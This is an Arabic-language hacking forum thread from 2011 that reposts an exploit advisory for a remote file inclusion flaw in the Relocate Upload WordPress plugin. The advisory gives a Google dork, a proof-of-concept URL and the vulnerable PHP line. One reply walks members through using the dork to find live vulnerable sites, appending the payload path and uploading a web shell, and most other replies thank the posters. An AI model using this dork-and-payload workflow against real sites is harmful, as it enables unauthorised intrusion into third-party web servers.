:: vBspiders Professional Network ::
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغره في سكربت ورد برسس ريموت فايلن انكلود (http://www.vbspiders.com/vb/showthread.php?t=58561)

hank00sh 09-20-2011 05:50 AM
ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
السلام عليكم ورحمة الله وبركاته

اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات

شوفت ثغرات جديده كلها في الورد برسس لوول

ومنها هذي الثغره

كود PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
 
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       // WP setup and function access
        define('WP_USE_THEMES'false);
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter 
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي :tears:

بس يارب الثغره تعجبكم

تحياتي لكم :bye1:

أبو محسن 09-20-2011 06:26 AM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
مشكوور اخوي وااااصل


تحياااتي لك

bleu moon 09-20-2011 06:03 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
اقتباس:
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي
^^

http://www.vbspiders.com/vb/f283.html

تابعها

inox team 09-20-2011 06:10 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
http://r23.imgfast.net/users/2313/11...les/911460.png

Mad-Hacker 09-20-2011 06:30 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
تصحيح
هذه ثغرة ليست في سكربت وردبرس انما , في اضافة - Plugins تضاف الى سكربت وردبرس .
وهناك فرق كبير جدا , لان في هذه الاضافة في اغلب الاحيان ليست من برمجة " وردبرس " , يعني لا علاقة لوردبرس بالخطىء البرمجي .

بالنسبة للاستغلال سهل جدا وان شاء الله تجد مواقع مصابة , شوف كيف

اولا ابحث في Google عن مواقع مصابة باستخدام هذا الدورك

inurl:wp-content/plugins/relocate-upload

رح يظهرك العديد من المواقع , اختر واحد منهم وادخل عليه , وازل من الرابط هذه ..

wp-content/plugins/relocate-upload

وحط مكانها
/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

وارفع شلك


Mad Hacker

bleu moon 09-20-2011 06:35 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
صح ^^ اغلب التغرات يلي بيكتشفوها الان في الورد بريس موجوده فقط في الاضافات :)

inox team 09-20-2011 06:47 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
صح و مشكور يا med haker

Gx1Sniper 09-20-2011 08:02 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
يعطيكم العافية :)

EG-HaCKeR 09-24-2011 07:06 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
الله يعطيكـ الف عافيه

راعي الحما 09-25-2011 01:03 AM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
جزاك الله الخير

مبدع

Mad-Hacker 09-25-2011 12:47 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
تحياتي لكم شباب

Dr.MwNs 09-25-2011 04:02 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
مشكور حبيبي على الثغره ^^

ننتظر جديدك

Mr.MeRo 09-27-2011 10:17 AM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
قويه يا غالي

s3c 10-07-2011 10:02 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
يعطييييك العاااااافيه شكراا%%

CODE3 10-08-2011 04:03 PM
رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود
 
مشكورين على الثغره ^^


الساعة الآن 07:35 PM
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0